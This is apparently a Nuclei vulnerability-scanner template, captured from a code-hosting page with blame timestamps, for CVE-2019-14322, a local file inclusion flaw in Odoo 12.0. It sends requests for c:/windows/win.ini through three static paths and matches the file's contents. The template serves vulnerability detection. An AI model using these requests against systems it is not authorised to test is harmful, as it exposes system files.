nuclei-templates/cves/2019/CVE-2019-14322.yaml

26 lines
574 B
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-14322
info:
name: Odoo 12.0 - Local File Inclusion
author: madrobot
severity: high
tags: cve,cve2019,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/base_import/static/c:/windows/win.ini"
- "{{BaseURL}}/web/static/c:/windows/win.ini"
- "{{BaseURL}}/base/static/c:/windows/win.ini"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
2020-07-31 17:42:34 +00:00
part: body